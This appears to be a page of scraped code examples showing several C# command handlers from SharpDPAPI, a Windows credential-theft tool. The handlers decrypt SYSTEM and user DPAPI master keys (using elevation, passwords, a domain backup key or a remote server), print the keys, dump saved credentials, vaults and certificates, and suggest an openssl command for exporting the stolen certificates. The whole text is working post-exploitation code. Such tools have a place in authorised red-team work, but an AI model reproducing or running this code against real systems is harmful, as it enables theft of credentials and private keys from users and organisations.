示例#1
0
        public void Execute(Dictionary <string, string> arguments)
        {
            Console.WriteLine("\r\n[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage\r\n");
            arguments.Remove("triage");


            if (!Helpers.IsHighIntegrity())
            {
                Console.WriteLine("[X] Must be elevated to triage SYSTEM DPAPI Credentials!");
            }
            else
            {
                Dictionary <string, string> mappings = Triage.TriageSystemMasterKeys();

                Console.WriteLine("\r\n[*] SYSTEM master key cache:\r\n");
                foreach (KeyValuePair <string, string> kvp in mappings)
                {
                    Console.WriteLine("{0}:{1}", kvp.Key, kvp.Value);
                }
                Console.WriteLine();

                Triage.TriageSystemCreds(mappings);
                Triage.TriageSystemVaults(mappings);
                Triage.TriageSystemCerts(mappings);
            }
        }
        public void Execute(Dictionary <string, string> arguments)
        {
            Console.WriteLine("\r\n[*] Action: Machine DPAPI Certificate Triage\r\n");

            if (!Helpers.IsHighIntegrity())
            {
                Console.WriteLine("[X] Must be elevated to triage SYSTEM DPAPI Credentials!");
            }
            else
            {
                Dictionary <string, string> mappings = Triage.TriageSystemMasterKeys();

                Console.WriteLine("\r\n[*] SYSTEM master key cache:\r\n");
                foreach (KeyValuePair <string, string> kvp in mappings)
                {
                    Console.WriteLine("{0}:{1}", kvp.Key, kvp.Value);
                }
                Console.WriteLine();

                if (arguments.ContainsKey("/target"))
                {
                    string target = arguments["/target"].Trim('"').Trim('\'');

                    Console.WriteLine("[*] Target Certificate File: {0}\r\n", target);
                    Triage.TriageCertFile(target, mappings, true);
                }

                else
                {
                    Triage.TriageSystemCerts(mappings);
                }

                Console.WriteLine("[*] Hint: openssl pkcs12 -in cert.pem -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out cert.pfx");
            }
        }
示例#3
0
        public void Execute(Dictionary <string, string> arguments)
        {
            Console.WriteLine("\r\n[*] Action: Machine DPAPI Credential and Vault Triage\r\n");
            arguments.Remove("triage");

            Dictionary <string, string> mappings = Triage.TriageSystemMasterKeys();

            Triage.TriageSystemCreds(mappings);
            Triage.TriageSystemVaults(mappings);
        }
        public void Execute(Dictionary <string, string> arguments)
        {
            Console.WriteLine("\r\n[*] Action: Machine DPAPI Masterkey File Triage\r\n");

            Dictionary <string, string> mappings = Triage.TriageSystemMasterKeys(false);

            if (mappings.Count == 0)
            {
                Console.WriteLine("\r\n[!] No master keys decrypted!\r\n");
            }
            else
            {
                Console.WriteLine("\r\n[*] SYSTEM master key cache:\r\n");
                foreach (KeyValuePair <string, string> kvp in mappings)
                {
                    Console.WriteLine("{0}:{1}", kvp.Key, kvp.Value);
                }
            }
        }
示例#5
0
        public void Execute(Dictionary <string, string> arguments)
        {
            Console.WriteLine("\r\n[*] Action: Certificate Triage");
            arguments.Remove("certificates");

            string server       = "";    // used for remote server specification
            bool   cng          = false; // used for CNG certs
            bool   showall      = false; // used for CNG certs
            bool   machineStore = false; // use the machine store instead of the personal certificate store

            // {GUID}:SHA1 keys are the only ones that don't start with /
            Dictionary <string, string> masterkeys = new Dictionary <string, string>();

            foreach (KeyValuePair <string, string> entry in arguments)
            {
                if (!entry.Key.StartsWith("/"))
                {
                    masterkeys.Add(entry.Key, entry.Value);
                }
            }

            if (arguments.ContainsKey("/cng"))
            {
                cng = true;
            }

            if (arguments.ContainsKey("/showall"))
            {
                showall = true;
            }

            if (arguments.ContainsKey("/machine"))
            {
                // machine certificate triage

                machineStore = true;

                if (arguments.ContainsKey("/mkfile"))
                {
                    masterkeys = SharpDPAPI.Helpers.ParseMasterKeyFile(arguments["/mkfile"]);
                }

                if (arguments.ContainsKey("/target"))
                {
                    string target = arguments["/target"].Trim('"').Trim('\'');

                    if (masterkeys.Count == 0)
                    {
                        Console.WriteLine("\r\n[X] Either a '/mkfile:X' or {GUID}:key needs to be passed in order to use '/target' for machine masterkeys");
                    }
                    else
                    {
                        if (File.Exists(target))
                        {
                            Console.WriteLine("[*] Target Certificate File: {0}\r\n", target);
                            Triage.TriageCertFile(target, masterkeys, cng, showall);
                        }
                        else if (Directory.Exists(target))
                        {
                            Console.WriteLine("[*] Target Certificate Folder: {0}\r\n", target);
                            Triage.TriageCertFolder(target, masterkeys, cng, showall);
                        }
                        else
                        {
                            Console.WriteLine("\r\n[X] '{0}' is not a valid file or directory.", target);
                        }
                    }
                }
                else
                {
                    if (masterkeys.Count == 0)
                    {
                        // if no /target and no masterkeys, try to extract the SYSTEM DPAPI creds
                        if (!Helpers.IsHighIntegrity())
                        {
                            Console.WriteLine("[X] Must be elevated to triage SYSTEM DPAPI Credentials!");
                        }
                        else
                        {
                            masterkeys = Triage.TriageSystemMasterKeys();

                            Console.WriteLine("\r\n[*] SYSTEM master key cache:\r\n");
                            foreach (KeyValuePair <string, string> kvp in masterkeys)
                            {
                                Console.WriteLine("{0}:{1}", kvp.Key, kvp.Value);
                            }
                            Console.WriteLine();

                            Triage.TriageSystemCerts(masterkeys);
                        }
                    }
                    else
                    {
                        // if we got machine masterkeys somehow else
                        Console.WriteLine(masterkeys.Count);
                        Triage.TriageSystemCerts(masterkeys);
                    }
                }
            }
            else
            {
                // user triage

                if (arguments.ContainsKey("/pvk"))
                {
                    // use a domain DPAPI backup key to triage masterkeys
                    masterkeys = SharpDPAPI.Dpapi.PVKTriage(arguments);
                }
                else if (arguments.ContainsKey("/mkfile"))
                {
                    masterkeys = SharpDPAPI.Helpers.ParseMasterKeyFile(arguments["/mkfile"]);
                }
                else if (arguments.ContainsKey("/password"))
                {
                    string password = arguments["/password"];
                    Console.WriteLine("[*] Will decrypt user masterkeys with password: {0}\r\n", password);
                    if (arguments.ContainsKey("/server"))
                    {
                        masterkeys = Triage.TriageUserMasterKeys(null, true, arguments["/server"], password);
                    }
                    else
                    {
                        masterkeys = Triage.TriageUserMasterKeys(null, true, "", password);
                    }
                }
                if (arguments.ContainsKey("/server"))
                {
                    server = arguments["/server"];
                    Console.WriteLine("[*] Triaging Certificates from remote server: {0}\r\n", server);
                    Triage.TriageUserCerts(masterkeys, server, showall);
                }

                if (arguments.ContainsKey("/target"))
                {
                    string target = arguments["/target"].Trim('"').Trim('\'');

                    if (File.Exists(target))
                    {
                        Console.WriteLine("[*] Target Certificate File: {0}\r\n", target);
                        Triage.TriageCertFile(target, masterkeys, cng, showall);
                    }
                    else if (Directory.Exists(target))
                    {
                        Console.WriteLine("[*] Target Certificate Folder: {0}\r\n", target);
                        Triage.TriageCertFolder(target, masterkeys, cng, showall);
                    }
                    else
                    {
                        Console.WriteLine("\r\n[X] '{0}' is not a valid file or directory.", target);
                    }
                }
                else
                {
                    Triage.TriageUserCerts(masterkeys, "", showall);
                }
            }

            Console.WriteLine("\r\n[*] Hint: openssl pkcs12 -in cert.pem -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out cert.pfx");
        }